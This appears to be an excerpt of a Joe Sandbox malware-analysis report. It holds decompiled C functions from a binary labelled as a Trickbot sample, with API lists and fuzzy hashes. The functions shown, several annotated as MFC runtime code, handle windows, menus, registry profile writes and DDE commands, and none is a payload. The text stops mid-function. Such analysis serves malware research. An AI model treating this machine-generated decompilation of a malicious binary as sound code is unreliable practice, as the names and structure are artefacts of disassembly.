                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00423FD8(void* __ecx, void* __eflags) {
                          				void* _t57;
                          				void* _t75;
                          				void* _t77;
                          
                          				E00405340(E004386DC, _t77);
                          				_t75 = __ecx;
                          				_push(__ecx);
                          				E004215AA(_t77 - 0x40, __eflags);
                          				 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
                          				GetClientRect( *(__ecx + 0x1c), _t77 - 0x2c);
                          				GetWindowRect( *(_t75 + 0x1c), _t77 - 0x1c);
                          				E0042147E(_t75, _t77 - 0x1c);
                          				OffsetRect(_t77 - 0x2c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
                          				E004212C8(_t77 - 0x40, _t77 - 0x2c);
                          				OffsetRect(_t77 - 0x1c,  ~( *(_t77 - 0x1c)),  ~( *(_t77 - 0x18)));
                          				E00429984(_t75, _t77 - 0x40, _t77 - 0x1c);
                          				E0042130A(_t77 - 0x40, _t77 - 0x1c);
                          				SendMessageA( *(_t75 + 0x1c), 0x14,  *(_t77 - 0x3c), 0);
                          				E00429B32(_t75, _t77 - 0x40, _t77 - 0x1c);
                          				_t25 = _t77 - 4;
                          				 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
                          				_t57 = E0042161C(_t77 - 0x40,  *_t25);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
                          				return _t57;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0042950C
                            • Part of subcall function 004215AA: __EH_prolog.LIBCMT ref: 004215AF
                            • Part of subcall function 004215AA: GetWindowDC.USER32(?), ref: 004215D8
                          • GetClientRect.USER32(?,?), ref: 0042952C
                          • GetWindowRect.USER32(?,?), ref: 00429539
                            • Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A23B), ref: 00421492
                            • Part of subcall function 0042147E: ScreenToClient.USER32(?,0041A243), ref: 0042149B
                          • OffsetRect.USER32(?,?,?), ref: 00429560
                            • Part of subcall function 004212C8: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 004212ED
                            • Part of subcall function 004212C8: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00421302
                          • OffsetRect.USER32(?,?,?), ref: 0042957E
                            • Part of subcall function 0042130A: IntersectClipRect.GDI32(?,?,?,?,?), ref: 0042132F
                            • Part of subcall function 0042130A: IntersectClipRect.GDI32(?,?,?,?,?), ref: 00421344
                          • SendMessageA.USER32(?,00000014,?,00000000), ref: 004295A5
                            • Part of subcall function 0042161C: __EH_prolog.LIBCMT ref: 00421621
                            • Part of subcall function 0042161C: ReleaseDC.USER32(?,00000000), ref: 00421640
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                          • String ID:
                          • API String ID: 2727942566-0
                          • Opcode ID: 62bb22d175033b747a62ae63b1036660585fd1810be35b8259a0e7cfe774f95f
                          • Instruction ID: 2f74603f0f0cea5cabda4f7a6efd9b4d3e0b84291617c0ac15baacd38671e928
                          • Opcode Fuzzy Hash: 62bb22d175033b747a62ae63b1036660585fd1810be35b8259a0e7cfe774f95f
                          • Instruction Fuzzy Hash: EF21ECB6E0011DAFCF15EBA4DC45DEEB77DEB54314F00462AE512E3190DA78A906CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E004243B4(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
                          				void* _v8;
                          				intOrPtr _v16;
                          				char _v20;
                          				struct tagRECT _v36;
                          				struct HDC__* _v48;
                          				struct HDC__* _v52;
                          				char _v56;
                          				struct tagTEXTMETRICA _v112;
                          				void* __ebp;
                          				void* _t28;
                          				int _t38;
                          				intOrPtr* _t43;
                          				intOrPtr _t55;
                          				intOrPtr* _t56;
                          				intOrPtr _t57;
                          
                          				_t56 = __ecx;
                          				_push(0);
                          				E004214F6( &_v56, __eflags);
                          				_t28 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
                          				_v8 = 0;
                          				if(_t28 != 0) {
                          					_v8 = SelectObject(_v52, _t28);
                          				}
                          				GetTextMetricsA(_v48,  &_v112);
                          				_t63 = _v8;
                          				if(_v8 != 0) {
                          					SelectObject(_v52, _v8);
                          				}
                          				E00421568( &_v56, _t63);
                          				SetRectEmpty( &_v36);
                          				E004312E3(_t56, _t63,  &_v36, _a12);
                          				 *((intOrPtr*)( *_t56 + 0xa0))(0x407, 0,  &_v20);
                          				_t38 = GetSystemMetrics(6);
                          				_t57 =  *((intOrPtr*)(_t56 + 0x78));
                          				_t55 = (_t38 + _v16 << 1) - _v36.bottom - _v36.top - _v112.tmInternalLeading + _v112.tmHeight - 1;
                          				if(_t55 < _t57) {
                          					_t55 = _t57;
                          				}
                          				_t43 = _a4;
                          				 *_t43 = 0x7fff;
                          				 *((intOrPtr*)(_t43 + 4)) = _t55;
                          				return _t43;
                          			}

                          APIs
                            • Part of subcall function 004214F6: __EH_prolog.LIBCMT ref: 004214FB
                            • Part of subcall function 004214F6: GetDC.USER32(?), ref: 00421524
                          • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004243D1
                          • SelectObject.GDI32(?,00000000), ref: 004243E8
                          • GetTextMetricsA.GDI32(?,?), ref: 004243F4
                          • SelectObject.GDI32(?,?), ref: 00424405
                          • SetRectEmpty.USER32(?), ref: 00424413
                          • GetSystemMetrics.USER32(00000006), ref: 00424448
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
                          • String ID:
                          • API String ID: 1789613188-0
                          • Opcode ID: 5272e07e1f72a70fe3f68d45a55a713366ba12661c2c458fd48274aee203f135
                          • Instruction ID: 9ba3e64bc3a9e1fa061dd9c1a67eab1121651931f825b011c5bad6a3fd72f779
                          • Opcode Fuzzy Hash: 5272e07e1f72a70fe3f68d45a55a713366ba12661c2c458fd48274aee203f135
                          • Instruction Fuzzy Hash: D0215E72E00219EFDF00DFA4DC89CAEBBB9FF44304B54402AE501A3260DB74AE11CB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00422BA1(void* __ecx) {
                          				void* __ebp;
                          				struct HACCEL__* _t26;
                          				struct HACCEL__* _t31;
                          				void* _t42;
                          				void* _t44;
                          				void* _t45;
                          				struct HINSTANCE__* _t46;
                          				struct HINSTANCE__* _t47;
                          				struct HINSTANCE__* _t48;
                          
				// Loads a menu and accelerator table for up to three resource IDs held in the object
				// (this+0x44, this+0x40, this+0x48), caching the handles beside them. Field layout and
				// API sequence match MFC CDocTemplate::LoadTemplate: statically linked runtime code,
				// not sample-specific logic. Trailing comments give the statement address from the report.
				_t44 = __ecx;  // 0x00422ba4  this
				_t45 = 0;  // 0x00422ba6
				_t26 =  *(__ecx + 0x60);  // 0x00422ba9  CString-style buffer at this+0x60
				_t42 = __ecx + 0x60;  // 0x00422bac
				_t49 =  *((intOrPtr*)(_t26 - 8));  // 0x00422baf  string length lives 8 bytes before the data
				if( *((intOrPtr*)(_t26 - 8)) == 0) {  // 0x00422bb2
					_t26 = E0041C67E(_t42, _t49,  *((intOrPtr*)(__ecx + 0x3c)));  // 0x00422bb7  empty: load the string from resource ID this+0x3c
				}  // 0x00422bb7
				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {  // 0x00422bcb  ID set, menu not yet loaded
					_t48 =  *(E00432562() + 0xc);  // 0x00422bd7  HINSTANCE used for resources (module state + 0xc)
					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);  // 0x00422be2  MAKEINTRESOURCE(LOWORD(id))
					_t26 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);  // 0x00422beb
					 *(_t44 + 0x30) = _t26;  // 0x00422bed
					_t45 = 0;  // 0x00422bf0
				}  // 0x00422bf0
				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {  // 0x00422bf5
					_t47 =  *(E00432562() + 0xc);  // 0x00422c01
					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);  // 0x00422c0c
					_t26 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);  // 0x00422c15
					 *(_t44 + 0x38) = _t26;  // 0x00422c17
					_t45 = 0;  // 0x00422c1a
				}  // 0x00422c1a
				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {  // 0x00422c1f
					_t46 =  *(E00432562() + 0xc);  // 0x00422c2b
					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);  // 0x00422c36
					_t31 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);  // 0x00422c3f
					 *(_t44 + 0x28) = _t31;  // 0x00422c41
					return _t31;
				}  // 0x00422c41
				return _t26;  // 0x00422c48
			}

                          APIs
                          • LoadMenuA.USER32(?,?), ref: 00422BE0
                          • LoadAcceleratorsA.USER32(?,?), ref: 00422BEB
                          • LoadMenuA.USER32(?,?), ref: 00422C0A
                          • LoadAcceleratorsA.USER32(?,?), ref: 00422C15
                          • LoadMenuA.USER32(?,?), ref: 00422C34
                          • LoadAcceleratorsA.USER32(?,?), ref: 00422C3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Load$AcceleratorsMenu
                          • String ID:
                          • API String ID: 144087665-0
                          • Opcode ID: d28eee83446aee033cb96b70b19bcd7dcb7d377c9e814a5fb453ca1c5690d225
                          • Instruction ID: 695b2b95001d0648f3485155c7e7e05556f449ab2dfbcd4e8162ad35ddaa80bb
                          • Opcode Fuzzy Hash: d28eee83446aee033cb96b70b19bcd7dcb7d377c9e814a5fb453ca1c5690d225
                          • Instruction Fuzzy Hash: 26213E71500B28EFC270AF669A40937F7F8FF14711740542FFA8682911D6B9F880DB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004286DC(struct HWND__* _a4, struct HWND__** _a8) {
                          				struct HWND__* _t6;
                          				void* _t12;
                          				struct HWND__** _t14;
                          				struct HWND__* _t15;
                          				struct HWND__* _t16;
                          				struct HWND__* _t17;
                          
				// Finds the top-level owner to use for a modal window and disables it, returning the
				// window that was disabled through _a8 so the caller can re-enable it afterwards.
				// Shape matches MFC CWnd::GetSafeOwner_ (statically linked runtime, not sample logic).
				// Trailing comments give the statement address from the report.
				_t17 = _a4;  // 0x004286e4  hParent passed by the caller
				_t16 = _t17;  // 0x004286ec
				if(_t17 != 0) {  // 0x004286ee
					L16:  // 0x00428755
					if((GetWindowLongA(_t16, 0xfffffff0) & 0x40000000) == 0) {  // 0x00428763  GWL_STYLE (-16), WS_CHILD: stop at the first non-child window
						L4:  // 0x00428704
						_t15 = _t16;  // 0x00428706
						_t6 = _t16;  // 0x00428708
						if(_t16 == 0) {  // 0x0042870a
							L6:  // 0x00428715
							if(_t17 == 0 && _t16 != 0) {  // 0x00428717
								_t16 = GetLastActivePopup(_t16);  // 0x00428724  no explicit parent: use the main window's active popup
							}  // 0x00428724
							_t14 = _a8;  // 0x00428726
							if(_t14 != 0) {  // 0x0042872c
								if(_t15 == 0 || IsWindowEnabled(_t15) == 0 || _t15 == _t16) {  // 0x00428730
									 *_t14 =  *_t14 & 0x00000000;  // 0x0042876c  nothing to re-enable later
								} else {  // 0x00428741
									 *_t14 = _t15;  // 0x00428744
									EnableWindow(_t15, 0);  // 0x00428746  disable the top-level owner for the modal loop
								}  // 0x00428746
							}  // 0x00428730
							return _t16;  // 0x00428775
						} else {
							goto L5;
						}
						do {  // 0x0042870c
							L5:  // 0x0042870c
							_t15 = _t6;  // 0x0042870d
							_t6 = GetParent(_t6);  // 0x0042870f  climb to the top-level window
						} while (_t6 != 0);  // 0x00428711
						goto L6;
					}  // 0x0042870c
					_t16 = GetParent(_t16);  // 0x00428768
					L15:  // 0x00428751
					if(_t16 == 0) {  // 0x00428753
						goto L4;
					}
					goto L16;
				}  // 0x00428753
				_t12 = E00428778();  // 0x004286f0  current thread object (main window HWND at +0x1c)
				if(_t12 != 0) {  // 0x004286f7
					L14:  // 0x0042874e
					_t16 =  *(_t12 + 0x1c);  // 0x0042874e
					goto L15;
				}  // 0x0042874e
				_t12 = E004041A9();  // 0x004286f9  fall back to the application object
				if(_t12 != 0) {  // 0x00428700
					goto L14;
				}
				_t16 = 0;  // 0x00428702
				goto L4;
			}

                          APIs
                          • GetParent.USER32(?), ref: 0042870F
                          • GetLastActivePopup.USER32(?), ref: 0042871E
                          • IsWindowEnabled.USER32(?), ref: 00428733
                          • EnableWindow.USER32(?,00000000), ref: 00428746
                          • GetWindowLongA.USER32(?,000000F0), ref: 00428758
                          • GetParent.USER32(?), ref: 00428766
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                          • String ID:
                          • API String ID: 670545878-0
                          • Opcode ID: b1deaf784306d6df2be37c99d0abefcacb69dc60422b5eb21341996539967a31
                          • Instruction ID: e0f9b195241dfb9b8aa2cada647a459aea9430d5cc9abc36a2b3baaee5cdbdcd
                          • Opcode Fuzzy Hash: b1deaf784306d6df2be37c99d0abefcacb69dc60422b5eb21341996539967a31
                          • Instruction Fuzzy Hash: 6A1170727073316B96216A69AC84B2FB2986FD4BA1FB5012FED00E7345DF6CCC0146AD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0042D210(intOrPtr _a4) {
                          				intOrPtr _v4;
                          				struct HWND__* _t15;
                          				struct HWND__* _t17;
                          				signed int _t21;
                          				intOrPtr _t28;
                          				void* _t30;
                          				struct HWND__* _t32;
                          
				// Walks every top-level window on the desktop and, for those owned by this window,
				// either hides them (_a4 == 0, SW_HIDE, flag 0x2 set) or restores the ones it hid
				// earlier (_a4 != 0, SW_SHOWNOACTIVATE, flag cleared). Matches MFC CWnd::ShowOwnedPopups;
				// the window hiding here is runtime behaviour, not a sample-specific evasion.
				// Trailing comments give the statement address from the report.
				_v4 = _t28;  // 0x0042d213  this
				_t15 = GetWindow(GetDesktopWindow(), 5);  // 0x0042d226  GW_CHILD: first top-level window
				_t32 = _t15;  // 0x0042d228
				if(_t32 == 0) {  // 0x0042d22c
					return _t15;  // 0x0042d2a5
				} else {  // 0x0042d22e
					while(1) {  // 0x0042d236
						_push(_t32);  // 0x0042d236
						_t30 = E00418874();  // 0x0042d23c  HWND -> window object lookup; NULL if not one of ours
						if(_t30 != 0) {  // 0x0042d240
							_t19 =  *((intOrPtr*)(_v4 + 0x1c));  // 0x0042d246  this->m_hWnd
							if( *((intOrPtr*)(_v4 + 0x1c)) != _t32 && E0042D065(_t19, _t32) != 0) {  // 0x0042d24b  skip self; E0042D065 = ownership test
								_t21 = GetWindowLongA(_t32, 0xfffffff0);  // 0x0042d25b  GWL_STYLE
								if(_a4 != 0) {  // 0x0042d266  restore
									if((_t21 & 0x18000000) == 0 && ( *(_t30 + 0x24) & 0x00000002) != 0) {  // 0x0042d284  not WS_VISIBLE|WS_DISABLED and marked temp-hidden
										ShowWindow(_t32, 4);  // 0x0042d28f  SW_SHOWNOACTIVATE
										 *(_t30 + 0x24) =  *(_t30 + 0x24) & 0xfffffffd;  // 0x0042d291  clear temp-hidden flag
									}  // 0x0042d291
								} else {  // 0x0042d268  hide
									if((_t21 & 0x18000000) == 0x10000000) {  // 0x0042d272  visible and enabled
										ShowWindow(_t32, 0);  // 0x0042d277  SW_HIDE
										 *(_t30 + 0x24) =  *(_t30 + 0x24) | 0x00000002;  // 0x0042d279  remember that we hid it
									}  // 0x0042d279
								}  // 0x0042d272
							}  // 0x0042d266
						}  // 0x0042d24b
						_t17 = GetWindow(_t32, 2);  // 0x0042d298  GW_HWNDNEXT
						_t32 = _t17;  // 0x0042d29a
						if(_t32 == 0) {  // 0x0042d29e
							return _t17;
						}  // 0x0042d2a1
					}  // 0x0042d29e
				}  // 0x0042d236
			}

                          APIs
                          • GetDesktopWindow.USER32 ref: 0042D219
                          • GetWindow.USER32(00000000), ref: 0042D226
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0042D25B
                          • ShowWindow.USER32(00000000,00000000), ref: 0042D277
                          • ShowWindow.USER32(00000000,00000004), ref: 0042D28F
                          • GetWindow.USER32(00000000,00000002), ref: 0042D298
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$Show$DesktopLong
                          • String ID:
                          • API String ID: 3178490500-0
                          • Opcode ID: 0df88fc64002af3fd1eb35134b311337ef61cacab5b3f29a159aefc937fd8bec
                          • Instruction ID: 903b80a427b79124565d036136ab7df7ba34bbb3bdfed7425468068a3415a626
                          • Opcode Fuzzy Hash: 0df88fc64002af3fd1eb35134b311337ef61cacab5b3f29a159aefc937fd8bec
                          • Instruction Fuzzy Hash: FE110E72B01761AAD2229628AC4ABABB38C9F41360FA40296F5009A384CB28DC4085BC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E00428879(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                          				long _t21;
                          				void* _t29;
                          
				// Profile writer: _a4 = section, _a8 = entry, _a12 = value. If no registry key name is
				// configured (this+0x7c == NULL) the data goes to the INI file named at this+0x90;
				// otherwise to the registry. The subcall list shows E00431F87 opening
				// HKEY_CURRENT_USER (0x80000001) "software", so writes land under HKCU\Software\...
				// Matches MFC CWinApp::WriteProfileString. Trailing comments give the statement address.
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {  // 0x00428882
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x90));
				}  // 0x0042890d
				if(_a8 != 0) {  // 0x00428888
					_push(_a4);  // 0x004288a9
					if(_a12 != 0) {  // 0x004288ac
						_t29 = E0043201B(__ecx);  // 0x004288ca  open/create the section key
						if(_t29 == 0) {  // 0x004288ce
							L3:  // 0x00428895
							return 0;
						}  // 0x00428895
						_t21 = RegSetValueExA(_t29, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);  // 0x004288e6  REG_SZ, size includes the NUL
						L10:  // 0x004288ec
						RegCloseKey(_t29);  // 0x004288ef
						return 0 | _t21 == 0x00000000;  // TRUE only on ERROR_SUCCESS
					}  // 0x004288f9
					_t29 = E0043201B(__ecx);  // 0x004288b3
					if(_t29 == 0) {  // 0x004288b7
						goto L3;
					}
					_t21 = RegDeleteValueA(_t29, _a8);  // 0x004288bd  value == NULL: delete the entry
					goto L10;
				}  // 0x004288bd
				_t29 = E00431F87(__ecx);  // 0x0042888f  open/create the application key
				if(_t29 != 0) {  // 0x00428893
					_t21 = RegDeleteKeyA(_t29, _a4);  // 0x0042889d  entry == NULL: delete the whole section key
					goto L10;
				}  // 0x0042889d
				goto L3;
			}

                          APIs
                          • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042889D
                          • RegDeleteValueA.ADVAPI32(00000000,00000000,?,00000000), ref: 004288BD
                          • RegCloseKey.ADVAPI32(00000000), ref: 004288EF
                            • Part of subcall function 00431F87: RegOpenKeyExA.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00431FB5
                            • Part of subcall function 00431F87: RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00431FD8
                            • Part of subcall function 00431F87: RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00431FF7
                            • Part of subcall function 00431F87: RegCloseKey.KERNEL32(?), ref: 00432007
                            • Part of subcall function 00431F87: RegCloseKey.KERNEL32(?), ref: 00432011
                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0042890D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                          • String ID:
                          • API String ID: 1886894508-0
                          • Opcode ID: 80f9fa64e6c2a6d8de0caac8d766ff3f62968a89e1417f100ba23b529a70ff8e
                          • Instruction ID: 48bcdaa2f9ce32829966b4feb2f3e5b080be05f1c9aa6f6bcedbd04c2fb2498b
                          • Opcode Fuzzy Hash: 80f9fa64e6c2a6d8de0caac8d766ff3f62968a89e1417f100ba23b529a70ff8e
                          • Instruction Fuzzy Hash: 3A117732502525FBCF262F60EC04BAF3B75AF04355F94402AFA1599160CB79CD51EB9D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E00436F50(void* __ecx) {
                          				int _v8;
                          				char _v12;
                          				void* __ebx;
                          				void* __edi;
                          				int _t14;
                          
				// GDI device-context setup on the two HDCs held at this+4 and this+8: reads the
				// output size, resets the mapping mode and origins, and clips to the page rectangle.
				// No file, registry or network side effects. Trailing comments give the statement address.
				_push(__ecx);  // 0x00436f53
				_push(__ecx);  // 0x00436f54
				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);  // 0x00436f65  VERTRES: height in pixels
				_v12 = GetDeviceCaps( *(__ecx + 8), 8);  // 0x00436f70  HORZRES: width in pixels
				_v8 = _t14;  // 0x00436f79
				E00436FD2(__ecx,  &_v12);  // 0x00436f7c  scales the size (subcall reads viewport/window extents)
				SetMapMode( *(__ecx + 4), 1);  // 0x00436f86  MM_TEXT
				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);  // 0x00436f94
				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);  // 0x00436fa4  origin stored at this+0x20/this+0x24
				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);  // 0x00436fbf  (-1,-1) to (width+2,height+2)
				return E00436DCB(_t14, __ecx, 0, 0);  // 0x00436fd1
			}

                          APIs
                          • GetDeviceCaps.GDI32(?,0000000A), ref: 00436F65
                          • GetDeviceCaps.GDI32(?,00000008), ref: 00436F6E
                            • Part of subcall function 00436FD2: GetViewportExtEx.GDI32(?,?), ref: 00436FE3
                            • Part of subcall function 00436FD2: GetWindowExtEx.GDI32(?,?), ref: 00436FF0
                          • SetMapMode.GDI32(?,00000001), ref: 00436F86
                          • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 00436F94
                          • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00436FA4
                          • IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 00436FBF
                            • Part of subcall function 00436DCB: GetViewportExtEx.GDI32(?,?), ref: 00436DE2
                            • Part of subcall function 00436DCB: GetWindowExtEx.GDI32(?,?), ref: 00436DEF
                            • Part of subcall function 00436DCB: GetDeviceCaps.GDI32(?,00000058), ref: 00436E5A
                            • Part of subcall function 00436DCB: GetDeviceCaps.GDI32(?,0000005A), ref: 00436E77
                            • Part of subcall function 00436DCB: SetMapMode.GDI32(00000000,00000008), ref: 00436E9D
                            • Part of subcall function 00436DCB: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 00436EAE
                            • Part of subcall function 00436DCB: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 00436EBF
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
                          • String ID:
                          • API String ID: 1729379761-0
                          • Opcode ID: 3771a1693c930a607ffe9eeab7710116c321ba7e8f33d8577270b197d535bb5b
                          • Instruction ID: ab10860d24474dd31859e5e511304c655a504ba448b904eb4759dc48bb87347c
                          • Opcode Fuzzy Hash: 3771a1693c930a607ffe9eeab7710116c321ba7e8f33d8577270b197d535bb5b
                          • Instruction Fuzzy Hash: E6015231200604BFDB215B56DC4AD5BBFFDEF89B20B00452DF156A21B0DBB1AC10DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E0042DE4A(void* __ecx, struct HWND__* _a4, intOrPtr _a8) {
                          				void* _v8;
                          				char _v12;
                          				char _v532;
                          				void* __ebp;
                          				long _t19;
                          				void* _t23;
                          				void* _t27;
                          
				// WM_DDE_EXECUTE handler: unpacks the lParam, copies the command string into a
				// 520-byte stack buffer (the copy is bounded to 0x208, so it truncates rather than
				// overflows), acknowledges with WM_DDE_ACK / DDE_FACK, then hands the string to the
				// application object's command handler. This is the path by which another process on
				// the same desktop can pass this window a command string; it matches MFC
				// CFrameWnd::OnDDEExecute -> CWinApp::OnDDECommand, i.e. runtime code, not sample logic.
				// Trailing comments give the statement address from the report.
				_push( &_v8);  // 0x0042de59  receives the hCommands global
				_push( &_v12);  // 0x0042de5d
				_push(_a8);  // 0x0042de63  lParam
				_t27 = __ecx;  // 0x0042de66
				_push(0x3e8);  // 0x0042de68  WM_DDE_EXECUTE
				L0040DA08();  // 0x0042de69  UnpackDDElParam (per API list)
				lstrcpynA( &_v532, GlobalLock(_v8), 0x208);  // 0x0042de84  bounded copy of the command string
				_t19 = GlobalUnlock(_v8);  // 0x0042de8d
				_push(_v8);  // 0x0042de93
				_push(0x8000);  // 0x0042de9b  DDE_FACK
				_push(0x3e4);  // 0x0042dea0  WM_DDE_ACK
				_push(0x3e8);  // 0x0042dea1  WM_DDE_EXECUTE
				_push(_a8);  // 0x0042dea2
				L0040DA02();  // 0x0042dea5  ReuseDDElParam (per API list)
				PostMessageA(_a4, 0x3e4,  *(_t27 + 0x1c), _t19);  // 0x0042deb2  ack to the client window, wParam = own HWND
				if(E0041B7FA(_t27) != 0) {  // 0x0042dec4  only when the frame window is enabled
					_t23 = E00432562();  // 0x0042dec6  module state
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 4)))) + 0x94))( &_v532);  // 0x0042ded9  app object vtable slot +0x94: execute the command string
				}  // 0x0042ded9
				return 0;  // 0x0042dee2
